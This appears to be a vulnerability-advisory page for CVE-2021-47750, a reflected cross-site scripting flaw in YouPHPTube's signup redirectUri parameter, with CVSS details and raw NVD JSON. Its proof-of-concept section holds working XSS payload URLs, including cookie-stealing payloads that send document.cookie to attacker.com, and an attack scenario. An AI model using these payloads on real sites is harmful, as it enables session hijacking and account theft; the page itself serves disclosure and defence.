Security Vulnerability Report
CVE-2021-47750 CVSS 6.1 MEDIUM

CVE-2021-47750

Published: 2026-01-13 23:15:49
Last Modified: 2026-01-22 20:27:31

Description

YouPHPTube <= 7.8 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the redirectUri parameter in the signup page. Attackers can craft special signup URLs with embedded script tags to execute arbitrary JavaScript in victims' browsers when they access the signup page.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:youphptube:youphptube:*:*:*:*:*:*:*:* - VULNERABLE
YouPHPTube <= 7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2021-47750 PoC - YouPHPTube XSS via redirectUri parameter -->
<!-- This PoC demonstrates the XSS vulnerability in YouPHPTube signup page -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2021-47750 PoC</title>
</head>
<body>
  <h1>CVE-2021-47750: YouPHPTube XSS Vulnerability PoC</h1>
  <p>Target: YouPHPTube &lt;= 7.8</p>

  <h2>Malicious Signup URL:</h2>
  <textarea rows="3" cols="80" readonly>
http://target-site.com/signup.php?redirectUri=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cspan%20x=%22
  </textarea>

  <h2>Alternative Payload - Cookie Stealer:</h2>
  <textarea rows="2" cols="80" readonly>
signup.php?redirectUri=%3Cimg%20src=x%20onerror=%22fetch%28%27https://attacker.com/steal?c=%27+document.cookie%29%22%3E
  </textarea>

  <h2>Attack Scenario:</h2>
  <ol>
    <li>Attacker crafts a malicious URL with XSS payload in redirectUri parameter</li>
    <li>Attacker sends the URL to victim via email, social media, or other channels</li>
    <li>Victim clicks the link and visits the signup page</li>
    <li>XSS payload executes in victim's browser, stealing cookies or performing actions</li>
  </ol>

  <!-- Output element that the script below writes to -->
  <pre id="generated-url"></pre>

  <script>
    // Simulate the vulnerable URL construction
    const baseUrl = window.location.origin + '/signup.php';
    const maliciousPayload = '\"><script>alert("XSS");document.location="https://attacker.com/redirect?c=' + encodeURIComponent(document.cookie) + '"<\/script>\<';
    const maliciousUrl = baseUrl + '?redirectUri=' + encodeURIComponent(maliciousPayload);
    console.log('Malicious URL:', maliciousUrl);
    // Show the generated URL as inert text (textContent does not parse HTML)
    document.getElementById('generated-url').textContent = maliciousUrl;
  </script>
</body>
</html>

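References

https://web.archive.org/web/20170506141644/https://www.youphptube.com/ (Not Applicable)
https://www.exploit-db.com/exploits/51101 (Exploit, Third Party Advisory, VDB Entry)
https://www.vulncheck.com/advisories/youphptube-cross-site-scripting (Third Party Advisory)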

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47750", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.097", "lastModified": "2026-01-22T20:27:30.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "YouPHPTube <= 7.8 contains a cross-site scripting vulnerability that allows attackers to inject malicious scripts through the redirectUri parameter in the signup page. Attackers can craft special signup URLs with embedded script tags to execute arbitrary JavaScript in victims' browsers when they access the signup page."}, {"lang": "es", "value": "YouPHPTube &lt;= 7.8 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar scripts maliciosos a través del parámetro redirectUri en la página de registro. Los atacantes pueden crear URLs de registro especiales con etiquetas de script incrustadas para ejecutar JavaScript arbitrario en los navegadores de las víctimas cuando acceden a la página de registro."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": 
"NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youphptube:youphptube:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.8", "matchCriteriaId": "7384B6B7-3F47-4F2D-91FA-F6C62381B359"}]}]}], "references": [{"url": "https://web.archive.org/web/20170506141644/https://www.youphptube.com/", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.exploit-db.com/exploits/51101", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/youphptube-cross-site-scripting", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}